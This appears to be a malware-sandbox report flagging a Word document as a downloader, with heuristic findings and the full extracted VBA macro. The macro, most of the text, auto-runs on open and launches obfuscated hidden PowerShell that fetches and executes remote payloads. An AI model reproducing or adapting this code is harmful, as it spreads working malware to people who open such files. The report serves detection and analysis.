MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The Autoopen macro triggers the execution of a Shell command, which in turn invokes PowerShell. The PowerShell command is obfuscated but appears to be designed to download and execute a second-stage payload, as indicated by the ClamAV detection name 'Doc.Downloader.Valyria-9978334-0'. The presence of the Shell() call and the auto-execution marker strongly suggest a downloader or droppper functionality.
Heuristics 7
-
ClamAV: Doc.Downloader.Valyria-9978334-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-9978334-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
End Select IfptzcXZCu = GXSpG + Shell(ihljNrm + Chr(vbKeyP) + zscViizWItK + WmZHcMNlaF + zVHjAk + rwdjDVQVQNz + zjanqdW + AHqVvwR, YPIiTiWrsK + vbHide + flAucG) Select Case KAlmABKT -
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub Autoopen() On Error Resume Next -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14837 bytes |
SHA-256: 43e435c9568071d3aa5d04cdffba4b2b1e7da0f963772d2cf4d3c44e8efbe332 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "hNjPsAJ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function IfptzcXZCu()
On Error Resume Next
Select Case KAljiZWU
Case 67457
qSGTjK = 14788
WhKjAD = CDbl(12933)
Case 25589
UrmqJG = PwYLQ
MzopJc = 26272
End Select
Select Case KAldOwjd
Case 26187
YWAZQ = 60971
dwmhL = CDbl(96121)
Case 8155
mwJpUM = Ktiztr
oHfszq = 49980
End Select
IfptzcXZCu = GXSpG + Shell(ihljNrm + Chr(vbKeyP) + zscViizWItK + WmZHcMNlaF + zVHjAk + rwdjDVQVQNz + zjanqdW + AHqVvwR, YPIiTiWrsK + vbHide + flAucG)
Select Case KAlmABKT
Case 83535
cQPvq = 54154
Zoswf = CDbl(23940)
Case 12491
RmLAIf = SwNMN
JnKtB = 13147
End Select
End Function
Sub Autoopen()
On Error Resume Next
Select Case KAlNjzAA
Case 73206
qACLNR = 82253
PzTiYa = CDbl(95991)
Case 32295
iOsQBi = iFoih
KzWwLS = 92601
End Select
IfptzcXZCu
Select Case KAlwwTaY
Case 19883
SirPT = 28400
mtQpR = CDbl(98807)
Case 62559
cIBap = MaPfU
fRYpcY = 56875
End Select
End Sub
Attribute VB_Name = "XzSOaoMc"
Function zscViizWItK()
On Error Resume Next
Select Case KAlDzRktS
Case 17115
fbKjj = 59492
PwokJj = CDbl(60291)
Case 25506
WNjoiG = IISUlj
pjnYLr = 48882
End Select
vQYRdAnpZ = "owersHeLL -" + "WinDowsTyle h" + "idden -e KAA" + "nAEYATAA2A" + "G4AcwBhACcAKw" + "AnAGQAJwAr" + "ACcAY" + "QAnACsAJw" + "BzAGQAIAA" + "nACsAJwA9A"
Select Case KAlhUwKw
Case 33408
osYlY = 27023
jUjYcC = CDbl(51925)
Case 32887
DjKzD = KTVTG
PpUHhw = 39456
End Select
YEowNdiLZ = "CAAJwArA" + "CcAJg" + "AnACsAJwAo" + "AG4AJwArAC" + "cAVQBlAG4AbgBVA" + "GUAKwB" + "uAFUAZQBlAG4A"
Select Case KAlwALZJ
Case 94624
pmPXp = 31238
vioSI = CDbl(34915)
Case 65326
PEIzU = OQuFGr
DUkpG = 5864
End Select
cjEkHR = "VQBlACsAbgA" + "nACsAJwBVAGU" + "AdwAtA" + "G8AYgAnACsAJw" + "BqAGU" + "AYwBuAFUAZQAr" + "AG4AVQBlAHQ" + "AbgBVA" + "GUAKQAgAHIAJw" + "ArACcAYQBu"
Select Case KAlhGwQP
Case 9957
qTPoCr = 85685
HRJcoa = CDbl(42645)
Case 39465
jYwrJ = cBPMX
HrkPj = 46897
End Select
kvWRwAwMDD = "AGQAbwBt" + "ADsARgBMADYAW" + "QBZAFUAI" + "AA9ACA" + "ALgAoAG4AVQBl" + "AG4AZ" + "QBuACcAK" + "wAnAFUAJwA"
Select Case KAlfREAUT
Case 25443
fdOuK = 73776
hrIChP = CDbl(74328)
Case 74111
iVazaZ = FCYpz
XbYwkw = 45714
End Select
aRUwzVNdKwq = "rACcAZ" + "QAnACsAJwArAG4" + "AVQAnACs" + "AJwBlACc" + "AKwAnAHcAbgBVAG" + "UAKwBuAFUAZQA" + "nACsAJwAt" + "ACcAKwA" + "nAG8AYgBqAGUA" + "YwB0AG4AVQBlAC"
Select Case KAlSMWcK
Case 86277
hrhsf = 32444
zsNsG = CDbl(30563)
Case 17543
lzfCTh = kfpOmM
EWQjH = 45919
End Select
wChHopqnJRi = "kAIABTACcAKwAnA" + "HkAcwB0AGU" + "AbQAuAE4AZQ" + "B0AC4AV" + "wBlAGIAQ"
Select Case KAlrwUOB
Case 53977
irqHrZ = 50314
zHZZC = CDbl(12785)
Case 3545
QiJqo = cZIlhu
LoRFw = 4365
End Select
zVtdLiJmPK = "wBsAGkAZQ" + "AnACsAJw" + "BuAHQA" + "OwBGACcAKw" + "AnAEwANgA"
Select Case KAlzGumji
Case 48206
HiUEp = 88554
jsmrr = CDbl(28451)
Case 31380
GsfZmT = TEEND
kWGJS = 39033
End Select
NawjEJHAK = "nACsAJwBOA" + "FMAQg" + "AgACc" + "AKwAnAD0" + "AIABGAEwAJwArAC" + "cANgA"
Select Case KAlZQdEG
Case 14184
ZTGLZ = 67827
nuDFm = CDbl(79285)
Case 99313
Qzbqu = VfiZuz
qPbTf = 27657
End Select
KHnIDS = "nACsAJwBuAHM" + "AYQBkAGEAcw" + "BkAC4" + "AJwArACc" + "AbgBlAHgAdA" + "AnACs"
Select Case KAlAztoTC
Case 92579
DEffTL = 99528
cPNFDo = CDbl(47390)
Case 73002
lhzicm = aROSG
XrDtbd = 87641
End Select
ioEMAKkK = "AJwAoAD" + "EAMAAwADAAMAAnA" + "CsAJwAsACAAMg" + "A4ADIAMQ" + "AzADMAKQA7" + "AEYATAA" + "2AEEARABDAFgA" + "IAA9ACAAb"
zscViizWItK = vQYRdAnpZ + YEowNdiLZ + cjEkHR + kvWRwAwMDD + aRUwzVNdKwq + wChHopqnJRi + zVtdLiJmPK + NawjEJHAK + KHnIDS + ioEMAKkK
End Function
Function WmZHcMNlaF()
On Error Resume Next
Select Case KAliOqmw
Case 7276
IiMZH = 19467
UwzbSX = CDbl(8120)
Case 3271
hWpsVC = MusPH
Hsiip = 34369
End Select
wVBXVdMsmWG = "gBVACcAKw" + "AnAGUADQAKACc" + "AKwAn" + "AGgAJwArACcAd" + "AB0AHA" + "AJwArACc" + "AOgAnACsAJwAvAC" + "8AaQAn" + "ACsAJwBuAH"
Select Case KAlBtzcoX
Case 9193
ALVLcR = 18310
ILwGU = CDbl(261)
Case 58003
uaArF = jhmOvn
MDwzO = 22642
End Select
TDwWpXzIiC = "QAcgBpAGcAdQAn" + "ACsAJwBlAHcAZQ" + "BiAC4AYwBvA" + "G0ALwBpAFE" + "AVgA2AEEALwAnA" + "CsAJw" + "BAAGgA" + "dAB0AHAAOgAnA"
Select Case KAlWEiCzc
Case 41700
tKSBP = 69580
NWNqDb = CDbl(76584)
Case 47810
VWsvI = JFousq
wucbNo = 52661
End Select
RsdWppoGqzn = "CsAJwAvAC8AJwAr" + "ACcAcABy" + "ACcAKwAnAG8AdgA" + "nACsA" + "JwBhACcAKwAnA" + "G4AZQA" + "nACsAJwB0" + "ACcAKwA"
Select Case KAluYnipb
Case 69318
IIifQ = 64090
kaOvBN = CDbl(24984)
Case 40143
rRYTNc = zzRaz
QSWZh = 62084
End Select
iACBtaVS = "nAC4AYwBvAC4Aag" + "BwAC8Ad" + "QA2AEMAZAAnA" + "CsAJwBCAC" + "8AQAA"
Select Case KAlJLjRSs
Case 2292
sajhDv = 76240
DQKfu = CDbl(67679)
Case 64751
GdiJvZ = fjiifl
AVbPH = 45117
End Select
wRAqmztviuA = "nACsAJwBoAHQAdA" + "BwACcA" + "KwAnADoAJ" + "wArACc" + "ALwAvAG0AYQByAH" + "UAZwAnACsAJw" + "BpAG4"
Select Case KAltuJduS
Case 16836
Asaih = 20185
NrCTwD = CDbl(1451)
Case 39654
ImwQp = icKQN
UjAGTJ = 61654
End Select
tzlcELH = "ALgBuAG" + "UAdAAv" + "AEsAZQB4AGEA" + "UQAvAE" + "AAaAB0ACcAK"
WmZHcMNlaF = wVBXVdMsmWG + TDwWpXzIiC + RsdWppoGqzn + iACBtaVS + wRAqmztviuA + tzlcELH
End Function
Function zVHjAk()
On Error Resume Next
Select Case KAlIBEwLH
Case 67878
nZisa = 94169
HVshw = CDbl(26366)
Case 96650
QzGsL = MftUi
GiAEh = 40552
End Select
WXtXoQE = "wAnAHQ" + "AJwArAC" + "cAcAA6AC8A" + "LwB0AHUAbABwAGM" + "AJwArACcAbw" + "BuAHMAdQ" + "BsAHQALgBuACcAK"
Select Case KAloklUI
Case 45973
skabj = 55227
hnzFP = CDbl(44966)
Case 20641
ulXvrO = VoAbv
iiczU = 1564
End Select
zfdrBlz = "wAnAGwALwBFA" + "E0AdwAnACs" + "AJwBpAFMAL" + "wBAAGgAdAB0ACc" + "AKwAnAHAAOgAvA" + "CcAKwAnAC" + "8AJwArACcAd" + "AB1AGQAbwAn" + "ACsAJwBpAG4" + "AJwArACcAdA"
Select Case KAlbESkB
Case 90864
vAwRz = 13578
qAwMf = CDbl(94424)
Case 37775
mbIjz = JWIuWB
pSmuwo = 58238
End Select
RurmTiiGzI = "BlAHIAb" + "gBlAH" + "QALgAnA" + "CsAJwBjAG8Ab" + "QAuAGIAcg" + "AvADYAWQBYAGUAU" + "wBiAC8AJwArA"
Select Case KAlpidoz
Case 84669
fkoDpM = 35869
cUvali = CDbl(81253)
Case 45133
FMBhJS = Ipuwsf
CGfrYF = 36276
End Select
imdXWJUYFRp = "CcAbgBV" + "AGUALgBTA" + "HAAbABpAHQAKAB" + "uAFUAZQA" + "nACsA" + "JwBAAG4AVQB" + "lACkAOwBGAEwA" + "NgBTAEQAQwAg" + "AD0AJwArACcAIA" + "BGAEwANgB"
Select Case KAlmWbKZ
Case 2053
sqzLC = 68272
qwVRFv = CDbl(72)
Case 35898
wzctU = nSRIt
iGzsiv = 94351
End Select
QiPkXpKEbf = "lAG4AdgAnACs" + "AJwA6ACcAKwAnAH" + "AAdQBiAGwAaQBjA" + "CcAKwAn" + "ACAAKwAgA"
Select Case KAlzhcIR
Case 30838
VGzXMU = 1011
NwHtlD = CDbl(63957)
Case 87090
qKLqWY = ACPZR
UcEYR = 22474
End Select
izAlWo = "G4AVQAnACsAJwBl" + "ACcAKwAnAEwAN" + "gBWAG4AVQBlAC" + "AAKwAnACsA"
Select Case KAlkjFic
Case 72538
aBLzPo = 66777
GEswh = CDbl(54718)
Case 45423
FbLtc = oNlVbJ
EhNkc = 93863
End Select
YNdSP = "JwAgAEYAJw" + "ArACcAT" + "AA2ACcAKwA" + "nAE4AUwBCACA" + "AJwArACc" + "AKwAn" + "ACsAJwAgA" + "CgAbgBVAGUAJ"
Select Case KAlrPJdlC
Case 40894
fSipMX = 1371
QsTvN = CDbl(97170)
Case 27067
MZICXf = EfZSp
iHaKo = 65102
End Select
CaAnRbjX = "wArACcALgBlAHgA" + "JwArACcAbgB" + "VACcAKwAnAGUAK" + "wBuAFUAZQBlAG4" + "AVQAnACsAJwB" + "lACkAOwB"
Select Case KAlrlwmE
Case 58490
sJBlsB = 28573
MtTcz = CDbl(9287)
Case 49159
nFKki = slYQvC
cWzsjV = 90014
End Select
aKzQRAmaE = "mAG8AcgBlAGEA" + "JwArACcAYwBoA" + "CgARgBM" + "ADYAYQBzA" + "GYAYwAgAGkA" + "bgAnACsAJwA" + "gAEYATAA2AEEARA"
Select Case KAloZoDSv
Case 62230
LiORbJ = 62967
tOHQQM = CDbl(53908)
Case 11698
pjXVk = jifzj
hPpMu = 23911
End Select
isLGBGEZ = "BDACcAKwAnAF" + "gAJwAr" + "ACcAK" + "QB7AHQAcgAnACsA" + "JwB5ACcAKwAnAHs" + "ARgBMADYAWQB" + "ZAFUAJwArACc" + "ALgAnACs"
zVHjAk = WXtXoQE + zfdrBlz + RurmTiiGzI + imdXWJUYFRp + QiPkXpKEbf + izAlWo + YNdSP + CaAnRbjX + aKzQRAmaE + isLGBGEZ
End Function
Function rwdjDVQVQNz()
On Error Resume Next
Select Case KAljkwTpE
Case 97776
OdNbz = 66467
cLIVbR = CDbl(59891)
Case 75246
JAWMwR = VAtZb
QiQlvU = 1597
End Select
awMRdqIwkCR = "AJwA2AGcAJwAr" + "ACcAVw" + "BEAG8AZAAn" + "ACsAJwA3ACcAKwA" + "nAEgAVwBuAGwAZ" + "AA3AEgATw" + "BhAGQAJwAr" + "ACcARgAnACsA" + "JwBJAGQANwBI" + "AGwAZQA2AG"
Select Case KAlXinpm
Case 59182
YkRBz = 5055
ohlWz = CDbl(49175)
Case 84884
DJQmua = qVKmi
RjXLmA = 94336
End Select
iRUurjM = "cAVwAoA" + "EYATAA2ACcA" + "KwAnAGEAcwAnAC" + "sAJwBmACcAKwAn" + "AGMALg" + "A2ACcAKwAnAGcAJ" + "wArACcAVwA" + "nACsAJwBUAG8AJw" + "ArACcAUwB0AH" + "IAZAA3"
Select Case KAlcXdoG
Case 87767
zZWbZw = 59265
ZAjdTt = CDbl(91296)
Case 82753
YXWwO = LZvLb
nwojWr = 93130
End Select
iWEoTU = "ACcAKwAnA" + "EgAJwAr" + "ACcAaQBkAD" + "cAJwAr" + "ACcASA" + "BOAGcANgBnA"
Select Case KAlLEpnFw
Case 20780
WdVjj = 33895
iWkkO = CDbl(22923)
Case 3976
lDslCv = zCzDAT
jtQzIC = 34011
End Select
SfFumwC = "FcAKAApACcAKwA" + "nACwA" + "IABGAEwANg" + "BTAEQAQwApAD"
Select Case KAlvFViFJ
Case 73392
hbIaE = 69315
MIGZj = CDbl(36963)
Case 64726
RwAnqU = DzMvI
QUqnLv = 33053
End Select
dlbKAiwcZIp = "sAJwArACc" + "AJgAoAG4A" + "VQBlAEkAbgB2A" + "G8AbgBVAG" + "UAJwArA" + "CcAKwBuAF" + "UAZQBrAG4" + "AVQBlACsAbgBVAG"
Select Case KAlrsdzjD
Case 84396
dlWNc = 8759
EWvmTY = CDbl(18401)
Case 26273
cawnQ = VXQBZE
nKQWB = 42261
End Select
zmGlTd = "UAJwArACcAZQA" + "tAEkAdAAnACsAJ" + "wBlAG0AJ" + "wArACc" + "AbgBVAGUAJ" + "wArACcAKQAoAEY" + "ATAA2AFMA" + "RABDACkAJwArACc"
rwdjDVQVQNz = awMRdqIwkCR + iRUurjM + iWEoTU + SfFumwC + dlbKAiwcZIp + zmGlTd
End Function
Function zjanqdW()
On Error Resume Next
Select Case KAlYuJLjl
Case 32684
JzChi = 40443
GHElr = CDbl(31774)
Case 98166
aijijl = wWnmj
QkDfUF = 27251
End Select
KbHcDMEGWrd = "AOwBi" + "ACcAKwAnAHIAZQ" + "BhACc" + "AKwAn" + "AGsAOwB9AG" + "MAYQB" + "0ACcAKwAnAGMAJw" + "ArACcAaAB7" + "AH0AfQAnACkALg" + "BSAEUAUABsA"
Select Case KAlzrZBP
Case 7691
SQiKZ = 95557
jCDhim = CDbl(2783)
Case 61580
slqpWA = XLkib
HjThNi = 11555
End Select
ZtwzpQPYd = "EEAQwBlACgA" + "KABbAGMA" + "SABBAFIAXQA3A" + "DAAKwBbA" + "GMASABBAFIA" + "XQA3ADYAK" + "wBbAGMA"
Select Case KAlbKjiE
Case 2869
mabRTz = 63014
ZOlRK = CDbl(13242)
Case 99190
THtuWO = ZXakQb
HSwik = 69564
End Select
WKFZv = "SABBAFIAXQA1ADQ" + "AKQAsA" + "FsAUwBUAFIASQ" + "BuAGcAXQBbAGMA" + "SABBAFIAXQ" + "AzADYAKQAuA" + "FIARQBQAGwAQ" + "QBDAGUAKAAo"
Select Case KAlNIqaQ
Case 88471
cMvCc = 40302
aKGFY = CDbl(57612)
Case 4371
tMPpSH = SjWPf
wDUGU = 58569
End Select
XiEVjuhNGX = "AFsAYwBIAEE" + "AUgBdA" + "DEAMAAwACsAWwB" + "jAEgAQQBSAF0AN" + "QA1ACsAW" + "wBjAEgAQQBSA" + "F0ANwAyACkA"
Select Case KAlKiioGq
Case 61964
sYLGH = 37400
dKabL = CDbl(18023)
Case 87844
jMpKc = mwEzF
Oibjcb = 21001
End Select
DQkZiHYklzd = "LAAnAGAAJwApA" + "C4AUgB" + "FAFAAbABBA" + "EMAZQAoACgAWwBj" + "AEgAQ" + "QBSAF0AMQ"
Select Case KAlHKJYmi
Case 48855
ftTnR = 31523
cQfDA = CDbl(11221)
Case 50553
GBkBz = rwjwTG
DRXti = 56760
End Select
uAwwBHoNuo = "AxADAAK" + "wBbAGMAS" + "ABBAFIAXQA" + "4ADUAKw" + "BbAGMASABB" + "AFIAXQAxADA" + "AMQApACwAWwBT"
Select Case KAlLjRSz
Case 53421
SzXKUh = 6214
WChZZ = CDbl(78156)
Case 90666
pzJjYz = JRcHw
jSDXlY = 1469
End Select
jCSGIuEStVA = "AFQAU" + "gBJAG4" + "AZwBdAFsAY" + "wBIAEEA" + "UgBdADMAOQApAC" + "4AUgBFAFAAbABB" + "AEMAZQAoAC"
Select Case KAlnwYSA
Case 90360
MIEdP = 93154
UnuaTp = CDbl(26694)
Case 86161
ZGbmjd = nPuXB
kOXElz = 17797
End Select
FmhbwjEmMJa = "gAWwBjAEgAQQB" + "SAF0ANQA0AC" + "sAWwBj" + "AEgAQQBSAF0" + "AMQAwAD"
zjanqdW = KbHcDMEGWrd + ZtwzpQPYd + WKFZv + XiEVjuhNGX + DQkZiHYklzd + uAwwBHoNuo + jCSGIuEStVA + FmhbwjEmMJa
End Function
Function AHqVvwR()
On Error Resume Next
Select Case KAldjiGz
Case 29856
LFLwuG = 98026
ZIliG = CDbl(31817)
Case 26920
YbVDj = ODQjU
azflOY = 55484
End Select
rUfzXAf = "MAKwBbAG" + "MASABBAFIA" + "XQA4ADcAKQAsAFs" + "AUwBUAFIASQBuA" + "GcAXQB" + "bAGMASABBAFI" + "AXQAzADQAK" + "QAuAFIARQBQAGw" + "AQQBD"
Select Case KAljZGsl
Case 6411
vAOCHP = 20723
fcMwI = CDbl(81595)
Case 14092
LmCkbd = UinDmz
cRdDT = 7035
End Select
MiaNNijqz = "AGUAKAAoAFs" + "AYwBIAEEAUgB" + "dADcANgArAFsA" + "YwBIAEEAUgB" + "dADUANAAr" + "AFsAYwBIAEEAU" + "gBdADgANgApAC" + "wAJwBcACcAKQA" + "gAHwAIAB" + "pAGUAeAA="
AHqVvwR = rUfzXAf + MiaNNijqz
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.